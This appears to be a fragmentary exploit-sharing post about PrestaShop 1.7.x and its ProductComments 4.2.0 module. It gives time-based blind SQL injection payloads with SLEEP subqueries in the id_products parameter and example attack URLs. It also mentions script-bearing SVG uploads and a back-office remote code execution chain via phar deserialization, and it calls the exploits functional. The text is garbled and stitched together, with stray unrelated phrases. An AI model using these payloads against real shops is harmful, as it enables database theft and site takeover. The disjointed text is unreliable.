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Ps 1.7.7.x - 'id_product' SQL Injection

tamu secreto

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SQL Injection

Parameter: id_product

utility charger : 1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt)


http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt)



ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection




Example: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))


Cross-Site Request Forgery

The file manager, which allows the following files to be uploaded.
jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma, flv, webm
The SVG file upload can contain Javascript code.


Remote Code Execution

Vulnerable Package Link:


Apli:  PrestaShop 1.6.x <= & 1.7.x - Back Office Remote Code Execution

Chaining multiple vulnerabilities to trigger deserialization via phar

back-office-url email password func param.

The values were changed, to a good understanding few words. The exploits are functional !!🙄

greetings luck !😇







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